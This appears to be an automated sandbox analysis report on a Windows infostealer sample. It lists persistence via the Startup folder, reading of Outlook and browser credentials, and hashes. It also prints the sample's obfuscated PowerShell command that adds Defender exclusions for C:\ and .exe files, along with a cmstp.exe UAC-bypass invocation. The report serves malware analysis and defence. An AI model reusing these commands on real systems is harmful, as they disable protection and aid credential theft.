Analysis
-
max time kernel
104s -
max time network
109s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 23:55
Static task
static1
Behavioral task
behavioral1
Sample
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
Resource
win10v2004-20241007-en
General
-
Target
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
-
Size
28KB
-
MD5
fc7028093f5b39048ecff77e49c0da2c
-
SHA1
d9f1a1e4c77205dc444d47a5ffb37cce725350c5
-
SHA256
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
-
SHA512
260b5e123aff13f0ad6c13fb3536ae9fd4993181c00c85d813f99308ea83530b164a9bd5b4c733bdb1f19d9539b0dd13d2bfa92dbfac1c176e61a72402d8b458
-
SSDEEP
768:VOsOe+vfOM3ofGgTkqwsWQdNEgfavRVorMB75:VOsOeEO0FraavvT
Malware Config
Signatures
-
Drops startup file 1 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Executes dropped EXE 1 IoCs
Processes:
Sy.exepid process 2900 Sy.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/2220-3-0x000000001B0C0000-0x000000001B1A0000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
Processes:
Sy.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Sy.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Sy.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sy.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2768 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepid process 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepowershell.exetaskkill.exeSy.exedescription pid process Token: SeDebugPrivilege 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 2768 taskkill.exe Token: SeDebugPrivilege 2900 Sy.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepid process 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exedescription pid process target process PID 2220 wrote to memory of 2096 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe cmstp.exe PID 2220 wrote to memory of 2096 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe cmstp.exe PID 2220 wrote to memory of 2096 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe cmstp.exe PID 2220 wrote to memory of 2900 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe PID 2220 wrote to memory of 2900 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe PID 2220 wrote to memory of 2900 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe PID 2220 wrote to memory of 2900 2220 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe -
outlook_office_path 1 IoCs
Processes:
Sy.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe -
outlook_win_path 1 IoCs
Processes:
Sy.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2220 -
\??\c:\windows\system32\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf2⤵PID:2096
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2768
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5961df7710c27cd2a2452c11aa48ada24
SHA1081694e0067918b8355efef2cf72ef52d82e44b0
SHA256d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA51264f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae
-
Filesize
426KB
MD5d00a8f6a66f5fcaf18564b6f47831294
SHA1d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA51299937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27